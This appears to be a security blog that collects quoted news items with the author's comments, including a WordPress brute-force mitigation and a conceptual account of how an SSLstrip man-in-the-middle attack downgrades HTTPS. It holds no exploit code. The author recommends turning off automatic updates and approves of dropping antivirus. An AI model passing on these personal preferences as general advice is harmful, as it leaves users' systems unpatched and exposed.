Under a new bill, investigators would be able to hack into computers, install spyware, read emails and destroy files.
They could also break into servers located abroad, if they were being used to block services.
via BBC News – Dutch police may get right to hack in cyber crime fight.
This is no threat to a properly secured system. AV software is not a panacea for securing a system.
Moore’s census involved regularly sending simple, automated messages to each one of the 3.7 billion IP addresses assigned to devices connected to the Internet around the world (Google, in contrast, collects information offered publicly by websites). Many of the two terabytes (2,000 gigabytes) worth of replies Moore received from 310 million IPs indicated that they came from devices vulnerable to well-known flaws, or configured in a way that could to let anyone take control of them.
via Pinging the Whole Internet Reveals Unsecured Backdoors That Could Tempt Hackers and Cyber Criminals | MIT Technology Review.
1. Abandon antivirus
Businesses could remove host-based security from their desktops and trust that their perimeter will keep out the malware.
via Time To Dump Antivirus As Endpoint Protection? — Dark Reading.
There are some other useful tips in this article as well. I like the above quoted idea because AV software can be a pretty heavy load on an endpoint requiring constant maintenance and upgrade. These upgrade cycles in and of themselves pose a security hazard. The more complex a system becomes, the more that can go wrong.
As I type these words, there is an on-going and highly-distributed, global attack on WordPress installations across virtually every web host in existence. This attack is well organized and again very, very distributed; we have seen over 90,000 IP addresses involved in this attack.
via Global WordPress Brute Force Flood | HostGator Web Hosting Blog | Gator Crossing.
This wordpress blog has been receiving these attacks since around the beginning of the year. Getting rid of the admin account is a first step and using strong passwords is a second, I chose to just shut down access from the Internet entirely by disabling the wp-admin directory and wp-login.php access in httpd.conf. That may not be practical for most sites however. The error logs were getting quiet in the last 3 or 4 weeks and then this week they’re back up to full speed blocking with IPs from ranges all over the place. It looks like I’m not the only one experiencing this according to here and here.
Update: From my observations of the logs over these last few months these bots are hitting the sites very patiently, sometimes once an hour thus running under the radar of the security plug ins I tried.
Update II: More links here, here, and from here:
These rules will block access for the offending IP address for 5 minutes upon 10 failed login attempts over a 3 minute duration.
This won’t work. Each IP from these bots may hit you once or twice an hour so any limit login plugin won’t detect them at any rate to ban them. You can’t stop this on an IP basis. Since my logs last rotated Sunday morning (almost 6 days ago) I have had 500 different IP addresses hit wp-login.php. They all have been given 403 Forbidden responses yet they keep coming.
Microsoft patchMicrosoft announced last night that it has stopped pushing a security update originally released on Patch Tuesday because the fix is causing some PCs to blue screen. Microsoft recommends users uninstall the patch, which is also causing compatibility with some endpoint security software.
via Microsoft: Uninstall Faulty Patch Tuesday Security Update | threatpost.
This is why I always turn automatic updates off on all PCs and update on my own terms and on my own schedule.
Today I am publishing 5 Linksys router vulnerabilities so that consumers may be aware of the risks.
via Don’t Use Linksys Routers « Superevr.
I run a WRT54GL in my network but installed tomato on it because I never liked the linksys GUI and wanted to try out tomato. Here’s his take on the WRT54GL:
1. Linksys WRT54GL Firmware Upload CSRF Vulnerability
I demonstrate Cross-Site File Upload in my BlackHat and AppSec USA talks. If you need more info on the vector itself, check out How to upload arbitrary file contents cross-domain by Kotowicz.
I suspect these kind of exploits exist in all consumer grade routers.
Unlike Microsoft’s solution, CAMP attempts to detect locally whether any downloaded file is malicious, before passing characteristics of the file to its server-based analysis system. First, the system checks the binary against a blacklist–in this case, Google’s Safe Browsing API. If that check returns no positive result and, if the file has the potential to be malicious, CAMP will check a whitelist to see if the binary is a known good file.
via Google Uses Reputation To Detect Malicious Downloads – Dark Reading.
CAMP’s 99-percent success rate trounced four antivirus products, which individually only detected at most 25 percent of the malicious files and collectively detected about 40 percent, the researchers stated.
Description: SSLstrip was released by Moxie to demonstrate the vulnerabilities he spoke about at Blackhat 2009. In this video we will look at how to get started with SSLstrip. We setup 2 vmware machines, one running Widnows XP (victim) and the other Backtrack 3 (Attacker). Before we actually begin hacking using SSLstrip, we need to setup the entire Man in the Middle Mechanism and packet redirection / forwarding mechanism. We do this by using the following commands in sequence:
via Sslstrip Tutorial.
This tool assumes a man in the middle setup and that http traffic (port 80) gets redirected to a port sslstrip listens to on the attacker’s machine (port 10000 in this video). Sslstrip then intercepts https traffic and returns to the victim http traffic. The victim thinking his traffic is encrypted is transmitting in plain text while sslstrip manages the ssl session with the victim’s destination (i.e. bank). Since this attack is using http the victim does not need to validate an ssl certificate thus it’s transparent. Detecting this attack is simple because the browser returns http in the displayed url instead of https so an alert victim should know. But not everyone may notice this.
Even the original social networking sites behind OAuth decided they really need other options for different use-cases, such as Twitter’s xAuth, or Yahoo offering Direct OAuth, which turns the entire scheme into a more complicated version of HTTP Basic Authentication, with no added benefits. Perhaps the most damaging point against OAuth, is that the original designer behind it decided to remove his name from the specification, and is washing his hands clean of it.
via Insane Coding: OAuth – A great way to cripple your API.